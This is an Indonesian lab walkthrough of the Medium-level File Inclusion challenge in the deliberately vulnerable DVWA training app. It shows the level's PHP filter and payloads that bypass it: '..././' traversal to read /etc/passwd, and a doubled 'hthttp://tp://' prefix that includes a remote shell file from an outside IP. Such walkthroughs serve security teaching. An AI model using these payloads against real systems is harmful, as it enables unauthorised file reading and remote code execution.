DVWA
  • Introduction
  • About The Author
  • Brute Force
    • Pengenalan
    • Low
    • Medium
    • High
  • Command Injection
    • Pengenalan
    • Low
    • Medium
    • High
  • CSRF
    • Pengenalan
    • Low
    • Medium
    • High
  • File Inclusion
    • Pengenalan
    • Low
    • Medium
    • High
  • File Upload
    • Pengenalan
    • Low
    • Medium
    • High
  • SQL Injection
    • Pengenalan
    • Low
    • Medium
    • High
  • SQL Injection (Blind)
    • Pengenalan
    • Low
    • Medium
    • High
  • XSS (DOM)
    • Pengenalan
    • Low
    • Medium
    • High
  • XSS (Reflected)
    • Pengenalan
    • Low
    • Medium
    • High
  • XSS (STORED)
    • Pengenalan
    • Low
    • Medium
    • High
  • CSP Bypass
    • Pengenalan
    • Low
    • Medium
    • High
Powered by GitBook
On this page
  • Mencari Informasi
  • Melakukan Serangan
  • Local File Inclusion
  • Remote File Inclusion

Was this helpful?

  1. File Inclusion

Medium

File Inclusion level Medium on DVWA

PreviousLowNextHigh

Last updated 5 years ago

Was this helpful?

Di bawah ini adalah source-code dari file inclusion level Medium di DVWA.

vulnerabilities/fi/source/medium.php
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?> 

Mencari Informasi

Kali ini jika kita kita menggunakan ../ atau ..\" untuk LFI dan http:// atau https:// untuk RFI, maka yang teks yang mengandung kata tersebut akan dihilangkan oleh fungsi .

Untuk mengatasi hal ini saya menemukan cara, yaitu menggunakan payload berikut:

..././ -> ../ #hasil setelah dihilangkan

dan

hthttp://tp://0.0.0.0/RFI-Shell.txt -> http://0.0.0.0/RFI-Shell.txt #hasil setelah dihilangkan

Bagaimana? Apakah anda mengerti? Perhatikan pada payload ..././, str_replace() akan menghilangkan karakter ../ sehingga hasilnya menjadi ../. Dan begitu juga yang RFI. Keren bukan?

Atau kita juga bisa membuka file melalu direktori /, seperti /etc/passwd seperti berikut:

Melakukan Serangan

Oke, pada kali ini sepertinya kita tetap bisa melakukan LFI maupun RCI.

Local File Inclusion

Di sini saya contohkan mengakses file /etc/passwd menggunakan cara "mundur direktori", sehingga payload yang bisa digunakan adalah seperti berikut:

?page=..././..././..././..././..././etc/passwd

Dan hasilnya berhasil!

Remote File Inclusion

Dari informasi yang telah kita kumpulkan, payload yang akan kita gunakan saat ini adalah seperti berikut:

?page=hthttp://tp://18.215.230.19/RFI-shell.txt

Dan hasilnya shell bisa dijalankan.

Kita sebagai peretas memang harus kreatif untuk mengatasi berbagai masalah.

Selamat kawan! Happy Hacking!

😉
🍻
😅
str_replace()